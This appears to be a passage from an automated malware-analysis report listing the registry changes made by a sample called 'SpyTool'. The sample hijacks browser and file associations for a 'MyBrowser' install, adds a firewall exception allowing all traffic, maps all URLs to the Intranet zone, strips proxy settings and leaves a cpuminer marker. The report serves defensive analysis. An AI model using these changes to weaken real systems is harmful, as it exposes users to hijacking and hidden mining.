"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150925"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"

[HKCR\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"

[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"

[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"

[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"

[HKCR\https\shell]
"(Default)" = "open"

[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"

[HKCR\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"

[HKCR\https\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D2 EF A0 E0 6D F4 46 9C 8C A1 A1 14 43 F1 C4"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"

[HKCR\HTTP]
"URL Protocol" = ""

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCR\HTTP\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"

[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"

[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"

[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\https]
"URL Protocol" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"

[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"

[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"

[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKCR\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"

[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"

The process nsp45.tmp:596 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 A0 43 49 52 DC 06 2B 32 72 07 86 97 D3 C8 D4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process taskkill.exe:1408 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E C2 4F ED 84 DE 61 F6 85 8C B7 6E D7 D9 57 BF"

The process taskkill.exe:248 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 40 25 A9 59 49 D4 95 5F D1 44 C1 BA 2C 69 D2"

The process taskkill.exe:1092 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 63 DA 08 7C 5B DC 38 2B 13 69 73 96 73 D9 0B"

The process wmic.exe:1336 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 6B 02 51 21 C9 D4 D0 BE A9 51 42 0F DD 9E 04"

The process amisid.exe:496 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC A4 89 A4 87 DB DB 5A 69 41 0B 02 CC B9 BE 8D"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"

The process amisid.exe:600 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 0A D9 92 60 D5 EE 28 B7 7D 87 3C F5 50 BB DA"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\InternetTurbo]
"UID" = "975F29BE8C8FD0BC5E8EBA2BBF1B629F"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process tasklist.exe:1852 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4F 09 7D 56 91 75 35 10 33 EF F8 ED 63 8D 30"

The process tasklist.exe:492 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 30 1C 8C 24 D3 3B 18 53 C9 78 61 CB 08 DB 02"

The process nsr21.tmp:908 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1C.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss25.tmp\registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 0A A8 1E 68 9B 79 BA 8F 55 F1 DF 64 03 5E 77"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

